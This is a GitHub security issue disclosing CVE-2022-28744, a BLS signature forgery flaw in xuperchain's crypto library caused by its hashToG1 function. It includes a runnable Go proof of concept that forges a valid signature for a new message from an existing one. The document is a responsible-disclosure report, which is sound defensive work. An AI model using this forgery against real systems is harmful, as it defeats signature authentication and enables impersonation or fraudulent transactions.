Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security issue #29

Open
k3mmio opened this issue Mar 9, 2022 · 1 comment
Open

Security issue #29

k3mmio opened this issue Mar 9, 2022 · 1 comment

Comments

@k3mmio
Copy link

k3mmio commented Mar 9, 2022

We would like to report a vulnerability in the crypto library.
Since there is no security policy mentioned for the repository, can you please forward any contact that we can use to disclose the vulnerability.
Not sure if the disclosure should be done straight in a public issue.
@k3mmio
Copy link
Author

k3mmio commented Apr 25, 2022
edited
Loading

Bug Description:
It is possible to forge BLS signature.

Details:
The bug is in the hash-to-curve function hashToG1() https://github.com/xuperchain/crypto/blob/master/core/bls_sign/signature.go#L135
since the point on the curve is created by scalar multiplication of hash h for message m with the g1 generator:
S = (sk *h) x G1
an attacker can forge a signature S' for m':
S' = (sk * h') x G1 = (h'/h) x S
where the h'/h is the modular inverse over mod |G1|

Proof of Concept:

package main

import (
	"log"
	"math/big"
	"encoding/json"
	"github.com/xuperchain/crypto/client/service/xchain"
	"github.com/xuperchain/crypto/core/hash"
	bls12_381_ecc "github.com/consensys/gnark-crypto/ecc/bls12-381"
	"github.com/xuperchain/crypto/core/common"
)


func forgeSignature(msg1 []byte, msg2 []byte, sigPointG1 *bls12_381_ecc.G1Affine) *bls12_381_ecc.G1Affine {


	k := hash.HashUsingSha256(msg1)
	intK := new(big.Int).SetBytes(k)

	// |G1| = 52435875175126190479447740508185965837690552500527637822603658699938581184513
	m := new(big.Int)
	m.SetString("52435875175126190479447740508185965837690552500527637822603658699938581184513", 10)

	inverse  := new(big.Int).ModInverse(intK, m)

	k2 := hash.HashUsingSha256(msg2)
	intK2 := new(big.Int).SetBytes(k2)



	forged := new(big.Int).Mul(intK2,inverse)
	forged = new(big.Int).Mod(forged, m)


	return new(bls12_381_ecc.G1Affine).ScalarMultiplication(sigPointG1, forged)
}

func main() {
	xcc := new(xchain.XchainCryptoClient)


	msg := []byte("Welcome to the world of super chain using NIST.")
	msg2 := []byte("Nobody expects the Spanish inquisition!")

	privateKeyBLS, publicKeyBLS, err := xcc.GenerateBlsKeyPair()
	if err != nil {
		log.Printf("GenerateBlsKeyPair failed and err is: %v", err)
		return
	}

	blsSig, err := xcc.SignBls(privateKeyBLS, msg)
	log.Printf("BLS signature is %s and err is %v", blsSig, err)

	isSignatureMatch, err := xcc.VerifyBlsSig(publicKeyBLS, blsSig, msg)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)


	signature := new(common.BlsSignature)
	json.Unmarshal(blsSig, signature)

	sigPointG1 := new(bls12_381_ecc.G1Affine)
	sigPointG1.Unmarshal(signature.S)

	sigPoint2G1 := forgeSignature(msg, msg2, sigPointG1)


	blsSigForged := &common.BlsSignature{
		S: sigPoint2G1.Marshal(),
	}

	sigContentForged, _ := json.Marshal(blsSigForged)
	log.Printf("%s", sigContentForged)

	isSignatureMatch, err = xcc.VerifyBlsSig(publicKeyBLS, sigContentForged, msg2)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)
}

Run:

go run test.go

The reserved number for this bug is CVE-2022-28744

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@k3mmio